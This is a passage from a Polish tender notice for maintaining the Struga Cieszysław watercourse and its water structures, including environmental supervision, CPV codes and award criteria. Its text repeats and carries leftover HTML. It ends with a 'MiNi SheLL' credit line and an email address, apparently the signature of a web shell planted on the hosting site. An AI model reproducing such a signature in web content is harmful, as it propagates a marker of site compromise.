1.3.1 Przedmiotem zamówienia na wszystkich zadaniach częściowych jest wykonanie usług zwanych dalej pracami utrzymaniowymi związanych z utrzymaniem w należytym  stanie technicznym koryt cieków naturalnych i kanałów oraz zlokalizowanych na nich budowli regulacyjnych i urządzeń wodnych stanowiących urządzenia melioracji wodnych podstawowych w celu zapewnienia:
- ochrony przed powodzią, 
- spływu lodu oraz przeciwdziałania powstawaniu niekorzystnych zjawisk lodowych,  
- warunków korzystania z wód w tym utrzymywania zwierciadła wody na poziomie umożliwiającym funkcjonowanie urządzeń wodnych,
- działania urządzeń wodnych, w szczególności ich odpowiedniego stanu technicznego i funkcjonalnego.
Zamówienie we wszystkich zadaniach częściowych obejmuje ponadto sprawowanie nadzoru przyrodniczego, który Wykonawca zapewni przez cały okres realizacji prac, na wszystkich obiektach objętych zamówieniem.
1.3.2 Przewidywane prace utrzymaniowe na wszystkich zadaniach częściowych obejmują:
- wykaszanie roślin z dna oraz brzegów cieków,
- usuwanie roślin pływających i korzeniących się w dnie,
- usuwanie drzew i krzewów porastających dno oraz brzegi,  
- usuwanie przeszkód naturalnych oraz wynikających z działalności człowieka, 
- zasypywanie wyrw w brzegach przez ich zabudowę biologiczną,
- udrażnianie koryt przez usuwanie zatorów utrudniających swobodny przepływ wód oraz usuwanie namułów i rumoszu, 
- remont i konserwację budowli regulacyjnych oraz ubezpieczeń w obrębie tych budowli i urządzeń wodnych,
- rozbiórkę lub modyfikację tam bobrowych oraz zasypywanie nor bobrów w brzegach śródlądowych wód powierzchniowych.
1.3.3 Nadzór przyrodniczy polegał będzie na kontroli i nadzorze nad wykonywanymi pracami utrzymaniowymi w celu zminimalizowania ewentualnych negatywnych skutków oddziaływania prowadzonych prac na środowisko przyrodnicze.
Zakres nadzoru przyrodniczego na wszystkich zadaniach częściowych obejmuje:
- rozpoznanie stanowisk, siedlisk roślin lub zwierząt, miejsc rozmnażania albo czasowego przebywania gatunków chronionych roślin lub zwierząt w granicach obiektu objętego pracami utrzymaniowymi, 
- zaproponowanie działań ochronnych zapobiegających potencjalnym negatywnym skutkom prowadzonych prac,
- kontrola realizacji przez Wykonawcę prac utrzymaniowych, zaleceń ochronnych w przypadku konieczności ich zastosowania,
- sprawozdanie końcowe z przeprowadzonego nadzoru zawierające wyniki prowadzonych obserwacji, opis działań podjętych w celu wyeliminowania potencjalnego, negatywnego wpływu prowadzonych prac na środowisko przyrodnicze, wnioski z podjętych działań oraz ich skuteczność.

Nadzór przyrodniczy prowadzony będzie przez cały okres realizacji prac utrzymaniowych i dokumentowany na kartach nadzoru przyrodniczego  załącznik nr 14 do SIWZ, zawierających opis aktualnie zinwentaryzowanych gatunków chronionych, zalecenia i podjęte działania mające na celu aktywną ochronę gatunków chronionych roślin i zwierząt w trakcie realizowanych prac wraz z dokumentacją fotograficzną stanowisk gatunków chronionych wykonaną przed rozpoczęciem prac, w trakcie i po ich zakończeniu.
Szczegółowe wymagania dotyczące prowadzenia nadzoru przyrodniczego zawarte są w wytycznych wykonania i odbioru prac utrzymaniowych oraz sprawowania nadzoru przyrodniczego - załącznik nr 8 do SIWZ.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6, 90721800-5,
                    45246000-3,
                    90500000-2,
                    71313000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin</td><td>20</td></tr><tr><td>Okres rękojmi</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Struga Cieszysław km 0+000  5+950<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.2. Miejsce realizacji: 
Województwo zachodniopomorskie, powiat pyrzycki. 
Zadanie częściowe nr 3 - Struga Cieszysław km 0+000  5+950; gmina Warnice; obręb Cieszysław, Zaborsko, Stary Przylep.

1.3.1 Przedmiotem zamówienia na wszystkich zadaniach częściowych jest wykonanie usług zwanych dalej pracami utrzymaniowymi związanych z utrzymaniem w należytym  stanie technicznym koryt cieków naturalnych i kanałów oraz zlokalizowanych na nich budowli regulacyjnych i urządzeń wodnych stanowiących urządzenia melioracji wodnych podstawowych w celu zapewnienia:
- ochrony przed powodzią, 
- spływu lodu oraz przeciwdziałania powstawaniu niekorzystnych zjawisk lodowych,  
- warunków korzystania z wód w tym utrzymywania zwierciadła wody na poziomie umożliwiającym funkcjonowanie urządzeń wodnych,
- działania urządzeń wodnych, w szczególności ich odpowiedniego stanu technicznego i funkcjonalnego.
Zamówienie we wszystkich zadaniach częściowych obejmuje ponadto sprawowanie nadzoru przyrodniczego, który Wykonawca zapewni przez cały okres realizacji prac, na wszystkich obiektach objętych zamówieniem.
1.3.2 Przewidywane prace utrzymaniowe na wszystkich zadaniach częściowych obejmują:
- wykaszanie roślin z dna oraz brzegów cieków,
- usuwanie roślin pływających i korzeniących się w dnie,
- usuwanie drzew i krzewów porastających dno oraz brzegi,  
- usuwanie przeszkód naturalnych oraz wynikających z działalności człowieka, 
- zasypywanie wyrw w brzegach przez ich zabudowę biologiczną,
- udrażnianie koryt przez usuwanie zatorów utrudniających swobodny przepływ wód oraz usuwanie namułów i rumoszu, 
- remont i konserwację budowli regulacyjnych oraz ubezpieczeń w obrębie tych budowli i urządzeń wodnych,
- rozbiórkę lub modyfikację tam bobrowych oraz zasypywanie nor bobrów w brzegach śródlądowych wód powierzchniowych.
1.3.3 Nadzór przyrodniczy polegał będzie na kontroli i nadzorze nad wykonywanymi pracami utrzymaniowymi w celu zminimalizowania ewentualnych negatywnych skutków oddziaływania prowadzonych prac na środowisko przyrodnicze.
Zakres nadzoru przyrodniczego na wszystkich zadaniach częściowych obejmuje:
- rozpoznanie stanowisk, siedlisk roślin lub zwierząt, miejsc rozmnażania albo czasowego przebywania gatunków chronionych roślin lub zwierząt w granicach obiektu objętego pracami utrzymaniowymi, 
- zaproponowanie działań ochronnych zapobiegających potencjalnym negatywnym skutkom prowadzonych prac,
- kontrola realizacji przez Wykonawcę prac utrzymaniowych, zaleceń ochronnych w przypadku konieczności ich zastosowania,
- sprawozdanie końcowe z przeprowadzonego nadzoru zawierające wyniki prowadzonych obserwacji, opis działań podjętych w celu wyeliminowania potencjalnego, negatywnego wpływu prowadzonych prac na środowisko przyrodnicze, wnioski z podjętych działań oraz ich skuteczność.

Nadzór przyrodniczy prowadzony będzie przez cały okres realizacji prac utrzymaniowych i dokumentowany na kartach nadzoru przyrodniczego  załącznik nr 14 do SIWZ, zawierających opis aktualnie zinwentaryzowanych gatunków chronionych, zalecenia i podjęte działania mające na celu aktywną ochronę gatunków chronionych roślin i zwierząt w trakcie realizowanych prac wraz z dokumentacją fotograficzną stanowisk gatunków chronionych wykonaną przed rozpoczęciem prac, w trakcie i po ich zakończeniu.
Szczegółowe wymagania dotyczące prowadzenia nadzoru przyrodniczego zawarte są w wytycznych wykonania i odbioru prac utrzymaniowych oraz sprawowania nadzoru przyrodniczego - załącznik nr 8 do SIWZ.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6, 90721800-5,
                    45246000-3,
                    90500000-2,
                    71313000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin</td><td>20</td></tr><tr><td>Okres rękojmi</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com